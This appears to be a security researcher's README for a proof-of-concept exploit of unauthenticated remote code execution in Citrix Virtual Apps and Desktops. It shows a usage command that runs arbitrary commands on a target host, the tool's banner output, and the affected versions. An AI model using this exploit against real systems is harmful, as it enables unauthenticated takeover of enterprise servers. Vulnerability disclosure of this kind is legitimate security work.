Citrix Virtual Apps and Desktops (XEN) Unauthenticated Remote Code execution
See our blog post for technical details
citrix-xen-exploit-demo.mp4
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-xxxx-xxxxx]
[INFO] Command sent to 192.168.1.120 successfully!
Any version from Citrix Virtual Apps and Desktops 7 2402 LTSR and before are vulnerable, more details at citrix advisory
This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Follow watchTowr Labs
For the latest security research follow the watchTowr Labs Team